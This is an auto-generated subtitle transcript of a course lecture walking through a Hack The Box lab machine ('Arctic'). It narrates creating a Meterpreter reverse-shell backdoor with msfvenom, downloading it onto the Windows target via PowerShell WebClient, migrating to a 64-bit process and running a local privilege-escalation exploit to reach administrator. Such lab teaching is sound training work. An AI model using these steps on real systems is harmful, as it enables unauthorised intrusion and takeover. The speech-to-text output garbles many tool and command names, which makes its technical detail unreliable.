1
00:00:00,600 --> 00:00:07,050
Hi, within this lecture, we're going to try and escalate our privilege, so in order to do that,

2
00:00:07,050 --> 00:00:08,900
I'm going to show you a new technique.

3
00:00:09,360 --> 00:00:19,500
So if you come over here with a shell, then you can try to actually escalate your shell into a metropolitan

4
00:00:19,500 --> 00:00:26,580
shell anyway, because, as you know, we try to get them a temperature shell, but we actually try

5
00:00:26,580 --> 00:00:28,500
to discover a way to get that.

6
00:00:28,680 --> 00:00:30,600
But we haven't found it yet.

7
00:00:30,900 --> 00:00:35,150
But since now we are inside of the network, we hacked into the machine.

8
00:00:35,430 --> 00:00:43,970
Then we can try to create a new shell and upload it over here and get a like a interpretational back.

9
00:00:44,280 --> 00:00:48,390
And by the way, I just mean regular back door.

10
00:00:49,050 --> 00:00:51,290
OK, so how do we do it?

11
00:00:51,720 --> 00:00:56,240
We can create an easily with MSF venom, right?

12
00:00:56,580 --> 00:01:02,650
We can come over here and just run the MSF venom with a interpretor payload like windows.

13
00:01:02,650 --> 00:01:05,940
Through interpreter Reverse TCP as usual.

14
00:01:06,300 --> 00:01:11,370
OK, and I'm going to give the Al Holston outport as usual.

15
00:01:11,700 --> 00:01:15,870
And for the outport I'm going to choose something other than four four four four.

16
00:01:15,870 --> 00:01:20,820
I'm going to go for one, two, three, four, because we are already using that and the format will

17
00:01:20,820 --> 00:01:28,620
be an XY and I'm going to save it under my I double double the amount which is my web server route and

18
00:01:28,620 --> 00:01:31,020
I'm going to call it my back door that XY.

19
00:01:31,380 --> 00:01:36,780
So this is basically a back door that we have seen in the complete ethical hacking course.

20
00:01:36,780 --> 00:01:43,950
If you have gotten that from us and that's it, that's how we create a back door.

21
00:01:44,280 --> 00:01:49,230
So rather than sending back door to a victim, we're just going to upload it ourselves.

22
00:01:49,740 --> 00:01:56,190
And in order to do that, we can use to use the certitudes that we have seen before.

23
00:01:56,730 --> 00:02:04,470
But this time, if the circuit util doesn't actually run or if Circuital doesn't work, I'm just going

24
00:02:04,470 --> 00:02:08,250
to show you a way to do it, an alternative way to do it as well.

25
00:02:08,670 --> 00:02:11,790
And it's done with the power shell, OK?

26
00:02:12,090 --> 00:02:16,230
And it's a little bit lower command and you need to memorize it.

27
00:02:16,470 --> 00:02:18,390
So it's a little bit annoying.

28
00:02:18,390 --> 00:02:25,920
But again, it will be very helpful for you if you can not download a file with a search, do so.

29
00:02:25,950 --> 00:02:28,110
You're going to have to take a node off this one.

30
00:02:28,380 --> 00:02:36,660
And I'm just going to ah, just read it through my notes in order to write it over here.

31
00:02:36,780 --> 00:02:39,450
OK, so this is Power Show.

32
00:02:40,110 --> 00:02:46,770
And again, Power Shell is a shell that we actually use in the Windows operating system.

33
00:02:47,110 --> 00:02:55,020
It leads us to run the commands in a more powerful or more privileged way if we can actually do this.

34
00:02:55,470 --> 00:02:57,390
And of course it doesn't.

35
00:02:57,390 --> 00:03:05,040
And there you can run a lot of commands in order to effectively manage your Windows operating system.

36
00:03:05,490 --> 00:03:08,520
And so the syntax goes like this.

37
00:03:08,520 --> 00:03:11,910
I'm going to say new object system.

38
00:03:12,090 --> 00:03:15,030
That's not that Web client.

39
00:03:15,030 --> 00:03:22,530
OK, so this is a Web client in order to make a request to VEP, and this is exactly what we are trying

40
00:03:22,530 --> 00:03:23,010
to do.

41
00:03:23,280 --> 00:03:30,300
So we're creating a new object of the Web client and you can just call, download file method of that

42
00:03:30,300 --> 00:03:31,830
Web client object.

43
00:03:32,260 --> 00:03:40,770
OK, so and after that, you're going to have to specify the URL over here to download the file that

44
00:03:40,770 --> 00:03:41,970
you need to download.

45
00:03:42,180 --> 00:03:44,670
And I'm doing this with a single quotation mark.

46
00:03:44,670 --> 00:03:45,600
As you can see.

47
00:03:46,010 --> 00:03:50,970
I'm going to write my baktir that ETECSA over here, of course, you're going to have to write your

48
00:03:50,970 --> 00:03:53,340
own name and your own IP address.

49
00:03:54,000 --> 00:03:58,980
And after that, you're going to have to specify what to call it after downloading.

50
00:03:58,980 --> 00:04:05,400
So I'm going to call this my baktir that one more time and close the a single quotation mark over here,

51
00:04:05,670 --> 00:04:12,600
closed apprentice's and close the double quotation mark that we have opened before.

52
00:04:13,140 --> 00:04:16,790
So syntax has has to be exactly like this.

53
00:04:17,220 --> 00:04:25,140
OK, so over here we're creating a new Web client and using the download file method of that Web client

54
00:04:25,380 --> 00:04:28,550
in order to make a request to this vector that easy.

55
00:04:28,590 --> 00:04:30,230
And after that, we going to save it.

56
00:04:30,690 --> 00:04:35,760
Now, if I run this, it can actually download this and save it.

57
00:04:36,030 --> 00:04:41,700
And by the way, if it doesn't work over here, you can try to go into the temp folder and try over

58
00:04:41,700 --> 00:04:42,210
there.

59
00:04:42,540 --> 00:04:48,630
But as you can see, I believe it's working or it's trying to work.

60
00:04:48,930 --> 00:04:51,230
It's downloading that Excel file.

61
00:04:51,630 --> 00:04:55,110
Let me try and see if it is going to work or not.

62
00:04:55,440 --> 00:04:56,640
And again, sometime.

63
00:04:56,650 --> 00:04:58,500
Circuital doesn't let you do that.

64
00:04:58,500 --> 00:04:59,910
And this Perusia will.

65
00:05:00,440 --> 00:05:09,110
So it's good to know the both of them, so take note of this comment and also the research to comment

66
00:05:09,440 --> 00:05:12,660
as well, like the broadcasting that we have seen before.

67
00:05:13,190 --> 00:05:15,230
Now, here you go.

68
00:05:15,260 --> 00:05:16,900
I believe now it's done.

69
00:05:16,910 --> 00:05:18,410
It took a while.

70
00:05:18,810 --> 00:05:21,700
I'm going around there and here you go.

71
00:05:21,710 --> 00:05:27,590
Now we see my back door that the exit and after completion, maybe you're going to have to hit enter

72
00:05:27,590 --> 00:05:29,200
in order to trigger it a little bit.

73
00:05:29,630 --> 00:05:35,360
Now, I'm going around the MSF council because we're going to create another listener for us, this

74
00:05:35,360 --> 00:05:40,010
time with the interpreter Paillot, so that we can get an interpreter back.

75
00:05:40,520 --> 00:05:46,430
And if we get the interpreter Shellback, we can easily run the post exploit module's.

76
00:05:46,430 --> 00:05:56,110
So that's why I'm having this hard time over here, OK, so that it can make our job very easy afterwards.

77
00:05:56,420 --> 00:05:58,760
So I'm going to set my payload to Windows.

78
00:05:58,790 --> 00:06:00,440
Interpreter to reverse TCP.

79
00:06:00,770 --> 00:06:06,560
If you say all options, you will see that you're going to have to write the host and of course we're

80
00:06:06,570 --> 00:06:09,440
going to have to change the outport as well to one, two, three, four.

81
00:06:09,770 --> 00:06:18,890
I'm going to explode this in background and now I'm going to run my back door that exit from the windows

82
00:06:18,890 --> 00:06:19,580
over here.

83
00:06:20,000 --> 00:06:20,900
And here you go.

84
00:06:20,900 --> 00:06:22,070
We have the back.

85
00:06:22,430 --> 00:06:29,000
So I'm going to hit, enter and interact with that station and it has to be sections.

86
00:06:29,390 --> 00:06:30,190
Here you go.

87
00:06:30,200 --> 00:06:36,860
Now, if I say get uid, we are told us one more time, but this time we have the interpreter station.

88
00:06:37,160 --> 00:06:43,590
So if I run this info you will see that I have the current connection with the active windows.

89
00:06:43,940 --> 00:06:44,630
Very good.

90
00:06:44,660 --> 00:06:46,640
Now again, we did the same thing.

91
00:06:46,640 --> 00:06:50,660
We did not escalate our privilege, but this time we escalated our shell.

92
00:06:51,020 --> 00:06:54,140
So we are in a Windows interpretation, right.

93
00:06:54,140 --> 00:06:59,900
That we fear I shall be can't go back to the shell that we were currently in, but this time in the

94
00:06:59,960 --> 00:07:00,650
interpreter.

95
00:07:00,650 --> 00:07:07,970
I can run run post Malti over here and recon and local exploits.

96
00:07:07,970 --> 00:07:13,820
I just are not exploited but exploit suggests are over here.

97
00:07:14,480 --> 00:07:15,320
Great.

98
00:07:15,320 --> 00:07:20,750
Now if I run, does it automatically collect all the data regarding these exploits?

99
00:07:20,750 --> 00:07:25,040
I just use it will display some results back to us.

100
00:07:25,610 --> 00:07:27,380
And here you go.

101
00:07:27,380 --> 00:07:31,610
It will try for the turkey for exploit checks.

102
00:07:31,610 --> 00:07:32,420
Great.

103
00:07:33,140 --> 00:07:38,720
Now we see some of the things that we have seen before over here, like Shell Aviator.

104
00:07:39,290 --> 00:07:45,890
And yeah, we have the M6 075 reflection here as well.

105
00:07:46,430 --> 00:07:51,170
This time I'm going to go for the elevator because as I said before, this is one of the most popular

106
00:07:51,170 --> 00:07:52,850
ones and we haven't seen it yet.

107
00:07:53,360 --> 00:08:00,560
So if you go over here to Google dot com and search for decelerator yourselves, then are going to see

108
00:08:01,010 --> 00:08:01,880
the tests.

109
00:08:01,880 --> 00:08:05,000
Cédula XHTML Privilege Escalation Tingay.

110
00:08:05,450 --> 00:08:07,160
So go into the rapid seven.

111
00:08:07,160 --> 00:08:09,740
Of course you can go for the other ones here as well.

112
00:08:10,700 --> 00:08:15,980
You can just see the descriptions over here as well as the usage as well.

113
00:08:16,010 --> 00:08:22,850
OK, so it seems that we can run this on both architectures like 32 bit, 64 bit.

114
00:08:23,260 --> 00:08:28,580
It says that it's collecting the local exploit for church to beat over here, but our architecture seems

115
00:08:28,580 --> 00:08:30,230
to be 64 bit.

116
00:08:30,800 --> 00:08:34,670
So I don't know whether it's going to cause any problems or not.

117
00:08:34,670 --> 00:08:38,690
But we can easily try this, right, because we already have the module over here.

118
00:08:38,930 --> 00:08:41,510
All you got to do is just copy this, OK?

119
00:08:41,840 --> 00:08:44,960
And I say use an interpreter station.

120
00:08:45,410 --> 00:08:53,170
And of course, we can have to just background this and then we can say use in the metals section,

121
00:08:53,180 --> 00:08:54,890
not in the interpreter section.

122
00:08:55,790 --> 00:09:02,420
So when you do that, if you on show options, you will see that you're going to have to set the station

123
00:09:02,420 --> 00:09:03,710
and our station is one.

124
00:09:04,310 --> 00:09:08,750
So I'm going to set the close to 10, 10, 14, 19.

125
00:09:09,140 --> 00:09:14,220
And for the outport, I'm going to choose something that we have never used before or 555.

126
00:09:14,870 --> 00:09:15,800
Here you go.

127
00:09:15,830 --> 00:09:17,510
I'm going to run, explode and see.

128
00:09:18,320 --> 00:09:18,770
Yep.

129
00:09:18,770 --> 00:09:22,730
It says that there's a problem over here.

130
00:09:22,730 --> 00:09:27,020
It says that try using an X sixty four interpretor.

131
00:09:27,440 --> 00:09:29,810
It's very good that we get this error back.

132
00:09:29,810 --> 00:09:35,540
As you can see, it asks for a specific version of the environment over here.

133
00:09:35,540 --> 00:09:41,690
So we're going to have to be in the six to four environment and we can try to switch it.

134
00:09:41,990 --> 00:09:43,490
So we haven't seen that before.

135
00:09:43,490 --> 00:09:45,770
So this is a great opportunity for us.

136
00:09:45,770 --> 00:09:47,510
So I'm going to go into the station one.

137
00:09:48,440 --> 00:09:53,270
So I'm going to say get UID or siccing for rather than get you ID.

138
00:09:53,510 --> 00:09:59,630
We see that architecture is already sixty 64, but I believe our station is in the.

139
00:09:59,700 --> 00:10:01,440
Her to OK.

140
00:10:01,530 --> 00:10:07,440
As you can see, the interpretation is in the 32 bit, so that's what's the that's what's causing the

141
00:10:07,440 --> 00:10:08,190
problems.

142
00:10:08,880 --> 00:10:15,530
So what we can do, we can try to migrate our process into something 64 bit.

143
00:10:16,260 --> 00:10:23,280
So in order to do that, you're going to have to display the processes that is being currently running

144
00:10:23,280 --> 00:10:25,110
over here with the comment.

145
00:10:26,190 --> 00:10:31,890
So if you ramp's comment, you can see all the process lists in the Windows operating system.

146
00:10:32,010 --> 00:10:39,150
And as you can see, our ACMD is the X Eighty-six, which is 32 bit over here.

147
00:10:39,450 --> 00:10:46,020
We're going to have to migrate it into something cold or something like 64 bit over here.

148
00:10:46,440 --> 00:10:52,860
Maybe we can just go into this one, Jiron EXI, which is the cold fusion.

149
00:10:53,220 --> 00:11:00,900
So all you've got to do is just migrate 11 84, which is the pide, OK, and if it doesn't work, you

150
00:11:00,900 --> 00:11:04,550
can try to go into other 64 bits as well.

151
00:11:05,340 --> 00:11:08,550
But this is I believe this worked very well.

152
00:11:09,040 --> 00:11:15,720
Now, if you have gotten the complete article hacking Kinkade's, you know what it means to migrate

153
00:11:15,720 --> 00:11:16,200
over here.

154
00:11:16,200 --> 00:11:21,940
And as you can see, the interpreter is now in the 64 bit as well.

155
00:11:22,410 --> 00:11:27,030
So we generally do this migration in order to persist our session.

156
00:11:27,210 --> 00:11:36,030
But this time we did it in order to go into a 64 bit session, which is most of the time much more stable,

157
00:11:36,030 --> 00:11:36,610
by the way.

158
00:11:37,260 --> 00:11:43,460
Now, I'm going to come over here and say show options to the elevator.

159
00:11:43,500 --> 00:11:48,210
A recession is still in one hour, host and outport is still OK.

160
00:11:48,240 --> 00:11:49,470
I'm going to run the exploit.

161
00:11:49,800 --> 00:11:52,020
And this time, as you can see, it's working.

162
00:11:52,170 --> 00:11:56,130
I didn't complain about the 64 bit thingy.

163
00:11:56,640 --> 00:11:58,590
And now I'm going to say, get your idea.

164
00:11:58,590 --> 00:11:59,430
And here you go.

165
00:11:59,520 --> 00:12:00,660
Now we are Rootie.

166
00:12:00,660 --> 00:12:01,980
We are administrator.

167
00:12:02,460 --> 00:12:05,010
So we manage to escalate our privileges.

168
00:12:05,400 --> 00:12:13,620
So if I run PWP, I mean the System 32, I'm going to go back and let me rumpy W.D., I mean, the C

169
00:12:13,980 --> 00:12:20,490
I'm going to go into the users and I'm going to run alerts to the administrator folder over here.

170
00:12:20,490 --> 00:12:27,900
I'm going to go into the administrator and if I run, unless I can see all the things regarding to administrator,

171
00:12:27,900 --> 00:12:33,930
I'm going to go into the desktop because that's where we find the root flag in the hack the box.

172
00:12:33,970 --> 00:12:37,320
OK, I'm going to cut this thing out and here you go.

173
00:12:37,350 --> 00:12:39,270
We managed to get the root flag.

174
00:12:39,870 --> 00:12:42,510
So this is how you hack the Arctic.

175
00:12:42,870 --> 00:12:49,830
Again, this is not a very good CTM because we're going to have to wait like ten seconds before we do

176
00:12:49,830 --> 00:12:50,430
anything.

177
00:12:50,670 --> 00:12:53,070
But again, it teaches us a lot.

178
00:12:53,250 --> 00:12:56,610
And we haven't seen this shallow or we haven't seen the migration.

179
00:12:56,610 --> 00:13:01,230
We haven't seen a lot of things in the section that we haven't covered before.

180
00:13:01,230 --> 00:13:04,110
So that's why we have chosen to do this.

181
00:13:04,590 --> 00:13:05,760
So far, so good.

182
00:13:05,760 --> 00:13:07,880
I hope you enjoyed this section.

183
00:13:08,070 --> 00:13:10,470
See you in the next one for closing.